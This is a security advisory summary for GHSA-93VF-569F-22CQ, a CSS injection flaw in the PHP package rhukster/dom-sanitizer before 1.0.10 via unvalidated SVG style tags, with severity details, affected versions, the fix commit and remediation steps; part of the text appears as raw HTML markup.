GHSA-93VF-569F-22CQ: GHSA-93VF-569F-22CQ: CSS Injection in PHP rhukster/dom-sanitizer via SVG Style Tags

#security #cve #cybersecurity #ghsa

GHSA-93VF-569F-22CQ: CSS Injection in PHP rhukster/dom-sanitizer via SVG Style Tags

Vulnerability ID: GHSA-93VF-569F-22CQ
CVSS Score: 4.7
Published: 2026-04-10

The PHP package rhukster/dom-sanitizer prior to version 1.0.10 is vulnerable to CSS Injection. The sanitizer permits the inclusion of <style> tags within SVG documents but fails to inspect or neutralize the textual content within these elements. This oversight allows attackers to inject arbitrary CSS, facilitating information disclosure, user tracking, and potential exfiltration of sensitive DOM data via CSS selectors.

TL;DR

A CSS injection vulnerability exists in rhukster/dom-sanitizer < 1.0.10 due to missing validation on SVG <style> tag content, allowing data exfiltration via external resource requests.

⚠️ Exploit Status: POC

Technical Details

CWE ID: CWE-79
Attack Vector: Network
CVSS Score: 4.7 (Medium)
Impact: Information Disclosure / CSS Injection
Exploit Status: PoC Available
KEV Status: Not Listed

Affected Systems

rhukster/dom-sanitizer (PHP/Composer ecosystem)
Applications utilizing rhukster/dom-sanitizer for SVG processing (e.g., Statamic CMS)
rhukster/dom-sanitizer: < 1.0.10 (Fixed in: 1.0.10)

Code Analysis

Commit: 49a9804

Fix CSS injection vulnerability by validating content</p> <h2> <a name="exploit-details" href="#exploit-details" class="anchor"> </a> Exploit Details </h2> <ul> <li><a href="https://github.com/rhukster/dom-sanitizer/security/advisories/GHSA-93vf-569f-22cq">GitHub Advisory Database</a>: Proof of concept demonstrating CSS injection via external URL request</li> </ul> <h2> <a name="mitigation-strategies" href="#mitigation-strategies" class="anchor"> </a> Mitigation Strategies </h2> <ul> <li>Update rhukster/dom-sanitizer to version 1.0.10 or later.</li> <li>Disable the <code><style></code> tag in the SVG allowlist configuration if CSS styling is not strictly required.</li> </ul> <p><strong>Remediation Steps:</strong></p> <ol> <li>Run <code>composer update rhukster/dom-sanitizer</code> to pull the latest patched version.</li> <li>Verify that the deployed version is >= 1.0.10 by inspecting the <code>composer.lock</code> file.</li> <li>Review application usage of DOMSanitizer to ensure SVG inputs do not implicitly trust rendered visual output.</li> </ol> <h2> <a name="references" href="#references" class="anchor"> </a> References </h2> <ul> <li><a href="https://github.com/rhukster/dom-sanitizer/security/advisories/GHSA-93vf-569f-22cq">GitHub Advisory: GHSA-93VF-569F-22CQ</a></li> <li><a href="https://github.com/rhukster/dom-sanitizer/commit/49a98046b708a4c92f754f5b0ef1720bb85142e2">Fix Commit 49a98046</a></li> <li><a href="https://github.com/rhukster/dom-sanitizer">rhukster/dom-sanitizer Repository</a></li> </ul> <hr> <p><em><a href="https://cvereports.com/reports/GHSA-93VF-569F-22CQ">Read the full report for GHSA-93VF-569F-22CQ on our website</a> for more details including interactive diagrams and full exploit analysis.</em></p>